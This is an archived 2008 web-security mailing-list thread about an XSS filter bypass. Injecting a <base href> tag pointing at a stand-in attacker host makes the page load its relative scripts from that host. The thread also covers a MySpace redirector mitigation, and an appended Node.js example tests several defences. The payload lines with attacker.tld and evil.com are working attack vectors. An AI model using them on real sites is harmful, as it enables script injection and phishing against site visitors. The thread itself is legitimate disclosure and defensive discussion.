Re: [WEB SECURITY] Nice little XSS trick
- From: "Amit Klein" <aksecurity@xxxxxxxxx>
- Subject: Re: [WEB SECURITY] Nice little XSS trick
- Date: Wed, 16 Jul 2008 17:34:20 +0300
Hi Arshan+list,
Indeed - the same vulnerability. I did google for it, but I didn't
pick up your site (and RSnake's cheat sheet doesn't list it - now I
know why).
Anyway - sorry. You deserve full credit for it, of course.
Thanks for the correction and the further information,
-Amit
On 7/16/08, Arshan Dabirsiaghi <arshan.dabirsiaghi@xxxxxxxxxxxxxxxxxx> wrote:
>
> http://i8jesus.com/?p=10 (Jan 2008)
>
> I also presented this vector last year at OWASP San Jose when I demo'ed
> AntiSamy as an example of dangerous content that isn't malicious code on its
> own. That's one of the selling points of AntiSamy – it stops not only XSS
> (well, we hope) but also prevents phishing attacks that abuse HTML/CSS.
>
> I talked about it with RSnake afterwards and he had some crazy reason for
> not putting it on his cheatsheet – claimed it was too much like the <base
> href="javascript:foo();//"> vector. As noted on my blog post, IE7 is no longer
> (according to policy) supposed to be honoring <base> tags outside of <HEAD>,
> but FF is still vulnerable. You could use this to hijack anything –
> stylesheets (more XSS/phishing), images, scripts, etc. The only thing <base>
> won't help you steal as far as resources is anything gathered in JavaScript.
>
> I think some of the big players had this figured out already (or more
> likely, just got really lucky). MySpace takes <base href> values, base64
> encodes them, and redirects them through another domain. The flow is like
> this for them:
>
> 1. User puts in <base href="http://evil.com">
> 2. Str = base64("http://evil.com")
> 3. Profile = <base href="http://msplinks.com/redir?<base64encodedStr>">
>
> Maybe there's a way to abuse that, but I don't think so. And eBay doesn't
> have any relative links after user content, at least when I first looked at
> this last year. They probably both just got lucky. =]
>
> Arshan
>
> ---------- Previous message ----------
> From: Amit Klein <aksecurity@xxxxxxxxx>
> Date: Tue, Jul 15, 2008 at 7:33 AM
> Subject: [WEB SECURITY] Nice little XSS trick
> To: Web Security <websecurity@xxxxxxxxxxxxx>
>
> Hi list
>
> Recently I've been thinking about bypassing anti-XSS filters, and a nice
> little trick occurred to me, which I haven't seen anywhere (e.g. it's not on
> RSnake's XSS cheat sheet - http://ha.ckers.org/xss.html; it does mention
> BASE, but not the trick I describe here). The idea is to use the HTML BASE
> tag to force loading of JS code from the attacker's host. Consider a page
> with an XSS vulnerability such as:
>
> <html>
> ...
> ***XSS code may be embedded here***
> ...
> <script src="/foo/bar.js"></script>
> ...
> </html>
>
> Now, an attacker can inject <base href="http://www.attacker.tld/">, and next
> thing you know, the browser (IE, at least) loads the JS from
> http://www.attacker.tld/foo/bar.js... And the beauty is that there's no
> "explicit" JS code involved in the payload itself.
>
> Note that according to the HTML standard, BASE should be placed in the HEAD
> section (http://www.w3.org/TR/html401/struct/links.html#edef-BASE).
> This is indeed observed by FF 2, but not by IE (checked IE6).
>
> Thanks,
>
> -Amit
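The resolution the two posts describe, as an added example that is not part of the thread (the helper names and the hosts www.victim.tld, www.attacker.tld and redirector.example are assumptions): a small Node.js script that resolves each relative <script src> the way a browser does once a <base href> is in the page, and tries the three responses the posts touch on: rejecting <base> in user content outright, rewriting its href through a site-controlled redirector in the way Arshan describes for MySpace, and addressing the script absolutely so that no <base> can move it. One note for today's reader that the 2008 posts predate: current browsers take the document base URL from the first <base href> in tree order wherever it sits in the document, which is why Content Security Policy carries a base-uri directive.

```javascript
// Added example, not code from the thread: emulate how a browser turns a
// relative <script src> into an absolute request once an injected <base href>
// is present, then show three server-side responses. Helper names and the
// hostnames (www.victim.tld, www.attacker.tld, redirector.example) are
// assumptions. Only the WHATWG URL class is used, so it runs under Node.js.
// The attribute scanner is regex based and good enough for this demo; it is
// not an HTML parser.

// Attribute value in any of the three HTML quoting styles; the value lands in
// whichever of the three capture groups matched.
const ATTR = '(?:"([^"]*)"|\'([^\']*)\'|([^\\s>]+))';
const BASE_HREF = new RegExp('(<base\\b[^>]*?\\bhref\\s*=\\s*)' + ATTR, 'gi');
const SCRIPT_SRC = new RegExp('<script\\b[^>]*?\\bsrc\\s*=\\s*' + ATTR, 'gi');

// Return the first capture group that actually matched.
const firstDefined = (...vals) => vals.find((v) => v !== undefined);

// The document base URL comes from the first <base href> in tree order
// (later ones are ignored), itself resolved against the page URL. An
// unparsable href, or no <base> at all, leaves the page URL in force.
function documentBaseUrl(html, pageUrl) {
  BASE_HREF.lastIndex = 0;
  const m = BASE_HREF.exec(html);
  if (!m) return pageUrl;
  try {
    return new URL(firstDefined(m[2], m[3], m[4]), pageUrl).href;
  } catch (e) {
    return pageUrl;
  }
}

// Absolute URL of every <script src=...>, resolved as a browser would.
function resolveScriptSources(html, pageUrl) {
  const base = documentBaseUrl(html, pageUrl);
  const urls = [];
  for (const m of html.matchAll(SCRIPT_SRC)) {
    urls.push(new URL(firstDefined(m[1], m[2], m[3]), base).href);
  }
  return urls;
}

// Response 1: refuse user content that carries a <base> element at all.
function containsBaseElement(userContent) {
  return /<base\b/i.test(userContent);
}

// Response 2: the redirector pattern described in the thread. The original
// href is base64-encoded and wrapped in a redirect URL on a host the site
// controls (redirectorPrefix is assumed, e.g. 'http://redirector.example/redir?').
function rewriteBaseHref(html, redirectorPrefix) {
  return html.replace(BASE_HREF, (whole, lead, dq, sq, bare) => {
    const original = firstDefined(dq, sq, bare);
    const token = Buffer.from(original, 'utf8').toString('base64');
    return lead + '"' + redirectorPrefix + token + '"';
  });
}

// The page layout from the original post: user content precedes a relatively
// addressed script. scriptSrc lets the caller try Response 3, an absolute
// script URL that no <base> can redirect.
function buildPage(userContent, scriptSrc = '/foo/bar.js') {
  return '<html>\n<body>\n' + userContent + '\n' +
    '<script src="' + scriptSrc + '"></script>\n</body>\n</html>';
}

// Constructed inputs: the victim page URL and the payload from the post.
function demo() {
  const pageUrl = 'http://www.victim.tld/profile';
  const payload = '<base href="http://www.attacker.tld/">';
  return {
    clean: resolveScriptSources(buildPage('hello'), pageUrl),
    hijacked: resolveScriptSources(buildPage(payload), pageUrl),
    rejected: containsBaseElement(payload),
    rewritten: resolveScriptSources(
      rewriteBaseHref(buildPage(payload), 'http://redirector.example/redir?'),
      pageUrl),
    absolute: resolveScriptSources(
      buildPage(payload, 'http://www.victim.tld/foo/bar.js'), pageUrl),
  };
}

console.log(demo());
```

Run it with node; demo() returns the script URL each variant would request: the clean page fetches from www.victim.tld, the injected page from www.attacker.tld, and the rewritten page from redirector.example rather than the attacker, because an absolute-path reference such as /foo/bar.js replaces the redirector URL's path and query during resolution. The absolutely addressed script is untouched by any <base>. The regex scanner will also pick up attributes such as data-src; use a real HTML parser in anything beyond a demonstration.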
----------------------------------------------------------------------------
Brought to you by http://www.webappsec.org